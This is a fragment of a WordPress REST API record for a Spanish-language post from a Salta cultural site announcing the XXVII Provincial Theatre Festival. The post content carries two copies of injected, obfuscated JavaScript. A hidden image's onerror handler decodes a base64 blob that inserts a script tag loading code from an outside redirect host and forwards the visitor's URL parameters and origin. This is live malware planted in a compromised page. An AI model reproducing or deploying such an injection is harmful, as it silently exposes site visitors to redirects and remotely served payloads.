'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Del 16 al 20 de noviembre se llevar\u00e1 a cabo, en la Ciudad de Salta, la XXVII\u00b0 Fiesta Provincial de Teatro. El INT tuvo la misi\u00f3n de acompa\u00f1ar a los grupos teatrales de la provincia, con el fin de lograr su participaci\u00f3n en la Fiesta. Como resultado, la mayor\u00eda de los elencos oriundos del interior [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1790,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-1789","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1789"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1789"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1789\/revisions"}],"predecessor-version":[{"id":7276,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1789\/revisions\/7276"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1790"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1789"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1789"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1789"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}